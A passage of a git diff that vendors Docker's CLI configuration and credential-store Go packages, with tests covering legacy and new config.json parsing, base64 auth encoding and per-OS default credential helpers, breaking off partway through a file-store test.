+	if err != nil {
+		t.Fatalf("Failed loading on missing file: %q", err)
+	}
+
+	// Now save it and make sure it shows up in new form
+	saveConfigAndValidateNewFormat(t, config, tmpHome)
+}
+
+func TestEmptyFile(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	_, err = Load(tmpHome)
+	if err == nil {
+		t.Fatalf("Was supposed to fail")
+	}
+}
+
+func TestEmptyJSON(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	// Now save it and make sure it shows up in new form
+	saveConfigAndValidateNewFormat(t, config, tmpHome)
+}
+
+func TestOldInvalidsAuth(t *testing.T) {
+	invalids := map[string]string{
+		`username = test`: "The Auth config file is empty",
+		`username
+password`: "Invalid Auth config file",
+		`username = test
+email`: "Invalid auth configuration file",
+	}
+
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpHome)
+
+	for content, expectedError := range invalids {
+		fn := filepath.Join(tmpHome, oldConfigfile)
+		if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil {
+			t.Fatal(err)
+		}
+
+		config, err := Load(tmpHome)
+		// Use Contains instead of == since the file name will change each time
+		if err == nil || !strings.Contains(err.Error(), expectedError) {
+			t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError)
+		}
+
+	}
+}
+
+func TestOldValidAuth(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpHome)
+
+	fn := filepath.Join(tmpHome, oldConfigfile)
+	js := `username = am9lam9lOmhlbGxv
+	email = user@example.com`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// defaultIndexserver is https://index.docker.io/v1/
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv"
+		}
+	}
+}`
+
+	if configStr != expConfStr {
+		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
+	}
+}
+
+func TestOldJSONInvalid(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpHome)
+
+	fn := filepath.Join(tmpHome, oldConfigfile)
+	js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	// Use Contains instead of == since the file name will change each time
+	if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") {
+		t.Fatalf("Expected an error got : %v, %v", config, err)
+	}
+}
+
+func TestOldJSON(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpHome)
+
+	fn := filepath.Join(tmpHome, oldConfigfile)
+	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv",
+			"email": "user@example.com"
+		}
+	}
+}`
+
+	if configStr != expConfStr {
+		t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr)
+	}
+}
+
+func TestNewJSON(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv"
+		}
+	}
+}`
+
+	if configStr != expConfStr {
+		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
+	}
+}
+
+func TestNewJSONNoEmail(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv"
+		}
+	}
+}`
+
+	if configStr != expConfStr {
+		t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr)
+	}
+}
+
+func TestJSONWithPsFormat(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	js := `{
+		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
+		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
+}`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` {
+		t.Fatalf("Unknown ps format: %s\n", config.PsFormat)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+	if !strings.Contains(configStr, `"psFormat":`) ||
+		!strings.Contains(configStr, "{{.ID}}") {
+		t.Fatalf("Should have save in new form: %s", configStr)
+	}
+}
+
+func TestJSONWithCredentialStore(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	js := `{
+		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
+		"credsStore": "crazy-secure-storage"
+}`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	if config.CredentialsStore != "crazy-secure-storage" {
+		t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+	if !strings.Contains(configStr, `"credsStore":`) ||
+		!strings.Contains(configStr, "crazy-secure-storage") {
+		t.Fatalf("Should have save in new form: %s", configStr)
+	}
+}
+
+func TestJSONWithCredentialHelpers(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	js := `{
+		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
+		"credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" }
+}`
+	if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	if config.CredentialHelpers == nil {
+		t.Fatal("config.CredentialHelpers was nil")
+	} else if config.CredentialHelpers["images.io"] != "images-io" ||
+		config.CredentialHelpers["containers.com"] != "crazy-secure-storage" {
+		t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers)
+	}
+
+	// Now save it and make sure it shows up in new form
+	configStr := saveConfigAndValidateNewFormat(t, config, tmpHome)
+	if !strings.Contains(configStr, `"credHelpers":`) ||
+		!strings.Contains(configStr, "images.io") ||
+		!strings.Contains(configStr, "images-io") ||
+		!strings.Contains(configStr, "containers.com") ||
+		!strings.Contains(configStr, "crazy-secure-storage") {
+		t.Fatalf("Should have save in new form: %s", configStr)
+	}
+}
+
+// Save it and make sure it shows up in new form
+func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string {
+	if err := config.Save(); err != nil {
+		t.Fatalf("Failed to save: %q", err)
+	}
+
+	buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(string(buf), `"auths":`) {
+		t.Fatalf("Should have save in new form: %s", string(buf))
+	}
+	return string(buf)
+}
+
+func TestConfigDir(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	if ConfigDir() == tmpHome {
+		t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome)
+	}
+
+	// Update configDir
+	SetConfigDir(tmpHome)
+
+	if ConfigDir() != tmpHome {
+		t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir())
+	}
+}
+
+func TestConfigFile(t *testing.T) {
+	configFilename := "configFilename"
+	configFile := NewConfigFile(configFilename)
+
+	if configFile.Filename != configFilename {
+		t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename)
+	}
+}
+
+func TestJSONReaderNoFile(t *testing.T) {
+	js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }`
+
+	config, err := LoadFromReader(strings.NewReader(js))
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+
+}
+
+func TestOldJSONReaderNoFile(t *testing.T) {
+	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
+
+	config, err := LegacyLoadFromReader(strings.NewReader(js))
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	ac := config.AuthConfigs["https://index.docker.io/v1/"]
+	if ac.Username != "joejoe" || ac.Password != "hello" {
+		t.Fatalf("Missing data from parsing:\n%q", config)
+	}
+}
+
+func TestJSONWithPsFormatNoFile(t *testing.T) {
+	js := `{
+		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } },
+		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
+}`
+	config, err := LoadFromReader(strings.NewReader(js))
+	if err != nil {
+		t.Fatalf("Failed loading on empty json file: %q", err)
+	}
+
+	if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` {
+		t.Fatalf("Unknown ps format: %s\n", config.PsFormat)
+	}
+
+}
+
+func TestJSONSaveWithNoFile(t *testing.T) {
+	js := `{
+		"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } },
+		"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
+}`
+	config, err := LoadFromReader(strings.NewReader(js))
+	err = config.Save()
+	if err == nil {
+		t.Fatalf("Expected error. File should not have been able to save with no file name.")
+	}
+
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatalf("Failed to create a temp dir: %q", err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
+	defer f.Close()
+
+	err = config.SaveToWriter(f)
+	if err != nil {
+		t.Fatalf("Failed saving to file: %q", err)
+	}
+	buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName))
+	if err != nil {
+		t.Fatal(err)
+	}
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv"
+		}
+	},
+	"psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}"
+}`
+	if string(buf) != expConfStr {
+		t.Fatalf("Should have save in new form: \n%s\nnot \n%s", string(buf), expConfStr)
+	}
+}
+
+func TestLegacyJSONSaveWithNoFile(t *testing.T) {
+
+	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
+	config, err := LegacyLoadFromReader(strings.NewReader(js))
+	err = config.Save()
+	if err == nil {
+		t.Fatalf("Expected error. File should not have been able to save with no file name.")
+	}
+
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatalf("Failed to create a temp dir: %q", err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	fn := filepath.Join(tmpHome, ConfigFileName)
+	f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
+	defer f.Close()
+
+	if err = config.SaveToWriter(f); err != nil {
+		t.Fatalf("Failed saving to file: %q", err)
+	}
+	buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expConfStr := `{
+	"auths": {
+		"https://index.docker.io/v1/": {
+			"auth": "am9lam9lOmhlbGxv",
+			"email": "user@example.com"
+		}
+	}
+}`
+
+	if string(buf) != expConfStr {
+		t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go
new file mode 100644
index 0000000000..39097133a4
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/configfile/file.go
@@ -0,0 +1,183 @@
+package configfile
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+)
+
+const (
+	// This constant is only used for really old config files when the
+	// URL wasn't saved as part of the config file and it was just
+	// assumed to be this value.
+	defaultIndexserver = "https://index.docker.io/v1/"
+)
+
+// ConfigFile ~/.docker/config.json file info
+type ConfigFile struct {
+	AuthConfigs          map[string]types.AuthConfig `json:"auths"`
+	HTTPHeaders          map[string]string           `json:"HttpHeaders,omitempty"`
+	PsFormat             string                      `json:"psFormat,omitempty"`
+	ImagesFormat         string                      `json:"imagesFormat,omitempty"`
+	NetworksFormat       string                      `json:"networksFormat,omitempty"`
+	VolumesFormat        string                      `json:"volumesFormat,omitempty"`
+	StatsFormat          string                      `json:"statsFormat,omitempty"`
+	DetachKeys           string                      `json:"detachKeys,omitempty"`
+	CredentialsStore     string                      `json:"credsStore,omitempty"`
+	CredentialHelpers    map[string]string           `json:"credHelpers,omitempty"`
+	Filename             string                      `json:"-"` // Note: for internal use only
+	ServiceInspectFormat string                      `json:"serviceInspectFormat,omitempty"`
+}
+
+// LegacyLoadFromReader reads the non-nested configuration data given and sets up the
+// auth config information with given directory and populates the receiver object
+func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error {
+	b, err := ioutil.ReadAll(configData)
+	if err != nil {
+		return err
+	}
+
+	if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil {
+		arr := strings.Split(string(b), "\n")
+		if len(arr) < 2 {
+			return fmt.Errorf("The Auth config file is empty")
+		}
+		authConfig := types.AuthConfig{}
+		origAuth := strings.Split(arr[0], " = ")
+		if len(origAuth) != 2 {
+			return fmt.Errorf("Invalid Auth config file")
+		}
+		authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1])
+		if err != nil {
+			return err
+		}
+		authConfig.ServerAddress = defaultIndexserver
+		configFile.AuthConfigs[defaultIndexserver] = authConfig
+	} else {
+		for k, authConfig := range configFile.AuthConfigs {
+			authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth)
+			if err != nil {
+				return err
+			}
+			authConfig.Auth = ""
+			authConfig.ServerAddress = k
+			configFile.AuthConfigs[k] = authConfig
+		}
+	}
+	return nil
+}
+
+// LoadFromReader reads the configuration data given and sets up the auth config
+// information with given directory and populates the receiver object
+func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error {
+	if err := json.NewDecoder(configData).Decode(&configFile); err != nil {
+		return err
+	}
+	var err error
+	for addr, ac := range configFile.AuthConfigs {
+		ac.Username, ac.Password, err = decodeAuth(ac.Auth)
+		if err != nil {
+			return err
+		}
+		ac.Auth = ""
+		ac.ServerAddress = addr
+		configFile.AuthConfigs[addr] = ac
+	}
+	return nil
+}
+
+// ContainsAuth returns whether there is authentication configured
+// in this file or not.
+func (configFile *ConfigFile) ContainsAuth() bool {
+	return configFile.CredentialsStore != "" ||
+		len(configFile.CredentialHelpers) > 0 ||
+		len(configFile.AuthConfigs) > 0
+}
+
+// SaveToWriter encodes and writes out all the authorization information to
+// the given writer
+func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error {
+	// Encode sensitive data into a new/temp struct
+	tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs))
+	for k, authConfig := range configFile.AuthConfigs {
+		authCopy := authConfig
+		// encode and save the authstring, while blanking out the original fields
+		authCopy.Auth = encodeAuth(&authCopy)
+		authCopy.Username = ""
+		authCopy.Password = ""
+		authCopy.ServerAddress = ""
+		tmpAuthConfigs[k] = authCopy
+	}
+
+	saveAuthConfigs := configFile.AuthConfigs
+	configFile.AuthConfigs = tmpAuthConfigs
+	defer func() { configFile.AuthConfigs = saveAuthConfigs }()
+
+	data, err := json.MarshalIndent(configFile, "", "\t")
+	if err != nil {
+		return err
+	}
+	_, err = writer.Write(data)
+	return err
+}
+
+// Save encodes and writes out all the authorization information
+func (configFile *ConfigFile) Save() error {
+	if configFile.Filename == "" {
+		return fmt.Errorf("Can't save config with empty filename")
+	}
+
+	if err := os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil {
+		return err
+	}
+	f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	return configFile.SaveToWriter(f)
+}
+
+// encodeAuth creates a base64 encoded string to containing authorization information
+func encodeAuth(authConfig *types.AuthConfig) string {
+	if authConfig.Username == "" && authConfig.Password == "" {
+		return ""
+	}
+
+	authStr := authConfig.Username + ":" + authConfig.Password
+	msg := []byte(authStr)
+	encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg)))
+	base64.StdEncoding.Encode(encoded, msg)
+	return string(encoded)
+}
+
+// decodeAuth decodes a base64 encoded string and returns username and password
+func decodeAuth(authStr string) (string, string, error) {
+	if authStr == "" {
+		return "", "", nil
+	}
+
+	decLen := base64.StdEncoding.DecodedLen(len(authStr))
+	decoded := make([]byte, decLen)
+	authByte := []byte(authStr)
+	n, err := base64.StdEncoding.Decode(decoded, authByte)
+	if err != nil {
+		return "", "", err
+	}
+	if n > decLen {
+		return "", "", fmt.Errorf("Something went wrong decoding auth config")
+	}
+	arr := strings.SplitN(string(decoded), ":", 2)
+	if len(arr) != 2 {
+		return "", "", fmt.Errorf("Invalid auth configuration file")
+	}
+	password := strings.Trim(arr[1], "\x00")
+	return arr[0], password, nil
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
new file mode 100644
index 0000000000..435797f681
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
@@ -0,0 +1,27 @@
+package configfile
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestEncodeAuth(t *testing.T) {
+	newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"}
+	authStr := encodeAuth(newAuthConfig)
+	decAuthConfig := &types.AuthConfig{}
+	var err error
+	decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if newAuthConfig.Username != decAuthConfig.Username {
+		t.Fatal("Encode Username doesn't match decoded Username")
+	}
+	if newAuthConfig.Password != decAuthConfig.Password {
+		t.Fatal("Encode Password doesn't match decoded Password")
+	}
+	if authStr != "a2VuOnRlc3Q=" {
+		t.Fatal("AuthString encoding isn't correct.")
+	}
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
new file mode 100644
index 0000000000..ca874cac51
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
@@ -0,0 +1,17 @@
+package credentials
+
+import (
+	"github.com/docker/docker/api/types"
+)
+
+// Store is the interface that any credentials store must implement.
+type Store interface {
+	// Erase removes credentials from the store for a given server.
+	Erase(serverAddress string) error
+	// Get retrieves credentials from the store for a given server.
+	Get(serverAddress string) (types.AuthConfig, error)
+	// GetAll retrieves all the credentials from the store.
+	GetAll() (map[string]types.AuthConfig, error)
+	// Store saves credentials in the store.
+	Store(authConfig types.AuthConfig) error
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
new file mode 100644
index 0000000000..b4733709b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
@@ -0,0 +1,22 @@
+package credentials
+
+import (
+	"os/exec"
+
+	"github.com/docker/docker/cliconfig/configfile"
+)
+
+// DetectDefaultStore sets the default credentials store
+// if the host includes the default store helper program.
+func DetectDefaultStore(c *configfile.ConfigFile) {
+	if c.CredentialsStore != "" {
+		// user defined
+		return
+	}
+
+	if defaultCredentialsStore != "" {
+		if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil {
+			c.CredentialsStore = defaultCredentialsStore
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
new file mode 100644
index 0000000000..63e8ed4010
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
@@ -0,0 +1,3 @@
+package credentials
+
+const defaultCredentialsStore = "osxkeychain"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
new file mode 100644
index 0000000000..864c540f6c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
@@ -0,0 +1,3 @@
+package credentials
+
+const defaultCredentialsStore = "secretservice"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
new file mode 100644
index 0000000000..519ef53dcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
@@ -0,0 +1,5 @@
+// +build !windows,!darwin,!linux
+
+package credentials
+
+const defaultCredentialsStore = ""
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
new file mode 100644
index 0000000000..fb6a9745cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
@@ -0,0 +1,3 @@
+package credentials
+
+const defaultCredentialsStore = "wincred"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
new file mode 100644
index 0000000000..ca73a384d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
@@ -0,0 +1,53 @@
+package credentials
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cliconfig/configfile"
+	"github.com/docker/docker/registry"
+)
+
+// fileStore implements a credentials store using
+// the docker configuration file to keep the credentials in plain text.
+type fileStore struct {
+	file *configfile.ConfigFile
+}
+
+// NewFileStore creates a new file credentials store.
+func NewFileStore(file *configfile.ConfigFile) Store {
+	return &fileStore{
+		file: file,
+	}
+}
+
+// Erase removes the given credentials from the file store.
+func (c *fileStore) Erase(serverAddress string) error {
+	delete(c.file.AuthConfigs, serverAddress)
+	return c.file.Save()
+}
+
+// Get retrieves credentials for a specific server from the file store.
+func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) {
+	authConfig, ok := c.file.AuthConfigs[serverAddress]
+	if !ok {
+		// Maybe they have a legacy config file, we will iterate the keys converting
+		// them to the new format and testing
+		for r, ac := range c.file.AuthConfigs {
+			if serverAddress == registry.ConvertToHostname(r) {
+				return ac, nil
+			}
+		}
+
+		authConfig = types.AuthConfig{}
+	}
+	return authConfig, nil
+}
+
+func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) {
+	return c.file.AuthConfigs, nil
+}
+
+// Store saves the given credentials in the file store.
+func (c *fileStore) Store(authConfig types.AuthConfig) error {
+	c.file.AuthConfigs[authConfig.ServerAddress] = authConfig
+	return c.file.Save()
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
new file mode 100644
index 0000000000..efed4e9040
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
@@ -0,0 +1,139 @@
+package credentials
+
+import (
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/cliconfig/configfile"
+)
+
+func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile {
+	tmp, _ := ioutil.TempFile("", "docker-test")
+	name := tmp.Name()
+	tmp.Close()
+
+	c := cliconfig.NewConfigFile(name)
+	c.AuthConfigs = auths
+	return c
+}
+
+func TestFileStoreAddCredentials(t *testing.T) {
+	f := newConfigFile(make(map[string]types.AuthConfig))
+
+	s := NewFileStore(f)
+	err := s.Store(types.AuthConfig{
+		Auth:          "super_secret_token",
+		Email:         "foo@example.com",
+		ServerAddress: "https://example.com",
+	})
+
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(f.AuthConfigs) != 1 {
+		t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs))
+	}
+
+	a, ok := f.AuthConfigs["https://example.com"]
+	if !ok {
+		t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs)
+	}
